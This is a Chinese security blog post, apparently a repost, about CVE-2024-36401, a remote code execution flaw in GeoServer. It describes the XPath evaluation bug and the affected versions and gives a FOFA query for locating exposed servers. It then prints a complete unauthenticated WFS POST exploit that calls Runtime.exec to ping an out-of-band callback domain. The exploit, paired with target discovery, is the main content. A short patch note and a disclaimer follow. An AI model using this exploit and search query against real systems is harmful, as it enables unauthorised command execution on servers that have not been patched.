CVE-2024-36401 RCE漏洞（附EXP）

2024年7月3日22:25:40评论67 views字数 1090阅读3分38秒阅读模式

叮～你有新的速递！CVE-2024-36401 RCE漏洞（附EXP）

0x01 前言

GeoServer 是一个开源服务允许用户共享和编辑地理空间数据。在版本 2.23.6、2.24.4 和 2.25.2 之前，多个 OGC 请求参数允许未经身份验证的用户通过针对默认 GeoServer 安装的特制输入进行远程代码执行（RCE），因为将属性名称评估为 XPath 表达式会不安全。GeoServer 调用的 GeoTools 库 API 评估要素类型的属性/属性名称，从而不安全地将它们传递给 commons-jxpath 库，该库在评估 XPath 表达式时可以执行任意代码。攻击者可以利用此漏洞执行任意命令，通过该漏洞可以获取服务器权限。

0x02 影响平台

GeoServer < 2.23.62.24.0 <= GeoServer < 2.24.42.25.0 <= GeoServer < 2.25.2

0x03 漏洞复现

搜索语法

FOFA：app="GeoServer"

页面是这个酱紫

叮～你有新的速递！CVE-2024-36401 RCE漏洞（附EXP）

EXP如下：

POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:808User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15Connection: closeContent-Length: 362Content-Type: application/xmlAccept-Encoding: gzip, deflate, br

<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0' valueReference='exec(java.lang.Runtime.getRuntime(),"ping frmjwegublhzilnkgwcfb5fbn9y1ofb8c.oast.fun -c 2")'> <wfs:Query typeNames='topp:states'/></wfs:GetPropertyValue>

Success~

叮～你有新的速递！CVE-2024-36401 RCE漏洞（附EXP）

0x04 修复方案

官方已发布安全补丁，建议联系厂商打补丁或升级版本。引入Web应用防火墙防护，配置接口拦截策略。

原文始发于微信公众号（哪都通安全）：叮～你有新的速递！CVE-2024-36401 RCE漏洞（附EXP）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-36401 RCE漏洞（附EXP）

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞 POC

CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞

CVE-2024-22243 Spring Web UriComponentsBuilder URL 解析不当漏洞分析

发表评论

在线咨询

微信